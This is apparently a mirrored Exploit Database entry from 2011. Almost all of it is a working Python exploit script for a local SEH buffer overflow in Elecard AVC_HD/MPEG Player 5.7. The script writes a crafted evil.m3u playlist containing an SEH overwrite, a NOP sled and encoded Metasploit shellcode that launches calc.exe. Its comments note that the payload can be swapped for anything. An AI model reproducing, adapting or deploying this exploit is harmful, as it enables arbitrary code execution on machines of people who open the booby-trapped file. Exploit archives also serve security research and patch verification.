Elecard AVC_HD/MPEG Player 5.7 – Local Buffer Overflow

• Exploit Database
• 12 阅读

• 作者： sickness
  日期： 2011-02-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16253/

• #!/usr/bin/env python
  # Software: Elecard AVC_HD/MPEG Player 5.7 (SEH)
  # Author: sickness
  # Download : http://www.elecard.com/en/products/end-user-software/playback/avchd-player.html
  # PoC for Elecard MPEG: http://www.exploit-db.com/exploits/16237/
  # Tested : Windows XP Professional SP3 (EN) latest updates
  # DATE : 26/02/2011
  # Bad chars: \x00\x0a\x0d\x25\x68\x08 There might be more so watch out !
  ###################################################################
  # You might need to change the offset.
  # The payload can be replaced with whatever you want, there is enough space.
  # 3/05/2011 - Vendor notified, NO FIX coming up
  ###################################################################
  
  import sys
  
  header="#EXTM3U\n"
  
  junk="\x42"*4
  nseh="\xeb\x06\x90\x90"
  seh="\xA6\xA0\x94\x73"	# p/p/r from D3DIM700.DLL
  nops = "\x90"*16
  
  # msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "\x00\x0a\x0d\x25\x68\x08" -t c
  sc = ("\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd\x1e"
  "\x9f\xec\x83\xeb\xfc\xe2\xf4\x01\xf6\x16\xec\xfd\x1e\xff\x65"
  "\x18\x2f\x4d\x88\x76\x4c\xaf\x67\xaf\x12\x14\xbe\xe9\x95\xed"
  "\xc4\xf2\xa9\xd5\xca\xcc\xe1\xae\x2c\x51\x22\xfe\x90\xff\x32"
  "\xbf\x2d\x32\x13\x9e\x2b\x1f\xee\xcd\xbb\x76\x4c\x8f\x67\xbf"
  "\x22\x9e\x3c\x76\x5e\xe7\x69\x3d\x6a\xd5\xed\x2d\x4e\x14\xa4"
  "\xe5\x95\xc7\xcc\xfc\xcd\x7c\xd0\xb4\x95\xab\x67\xfc\xc8\xae"
  "\x13\xcc\xde\x33\x2d\x32\x13\x9e\x2b\xc5\xfe\xea\x18\xfe\x63"
  "\x67\xd7\x80\x3a\xea\x0e\xa5\x95\xc7\xc8\xfc\xcd\xf9\x67\xf1"
  "\x55\x14\xb4\xe1\x1f\x4c\x67\xf9\x95\x9e\x3c\x74\x5a\xbb\xc8"
  "\xa6\x45\xfe\xb5\xa7\x4f\x60\x0c\xa5\x41\xc5\x67\xef\xf5\x19"
  "\xb1\x97\x1f\x12\x69\x44\x1e\x9f\xec\xad\x76\xae\x67\x92\x99"
  "\x60\x39\x46\xee\x2a\x4e\xab\x76\x39\x79\x40\x83\x60\x39\xc1"
  "\x18\xe3\xe6\x7d\xe5\x7f\x99\xf8\xa5\xd8\xff\x8f\x71\xf5\xec"
  "\xae\xe1\x4a\x8f\x9c\x72\xfc\xc2\x98\x66\xfa\xec")
  rest = "\x90"*(21000-len(header+junk+nseh+seh+nops+sc))
  
  exploit = header +junk + nseh + seh + nops + sc + rest
   
  try:
  	f=open("evil.m3u","w")
  	f.write(exploit)
  	f.close()
  	print "Done!"
  except:
  	print "Something went wrong!"